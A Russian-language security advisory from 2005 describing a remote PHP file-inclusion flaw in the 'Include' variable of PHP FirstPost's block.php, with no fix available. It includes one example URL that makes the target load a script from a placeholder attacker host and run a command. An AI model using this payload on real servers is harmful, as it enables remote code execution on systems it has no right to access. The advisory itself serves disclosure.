PHP-инклюдинг в PHP FirstPost

Дата публикации:
25.07.2005
Всего просмотров:
953
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PHP FirstPost

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует при обработке входных данных в переменной 'Include' сценария 'block.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Пример:

http://[target]/path_to_script/block.ph p?Include=http://[attacker]/cmd.gif?&cmd=|command|

URL производителя: phpfirstpost.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHP FirstPost remote file include vulnerability

или введите имя

CAPTCHA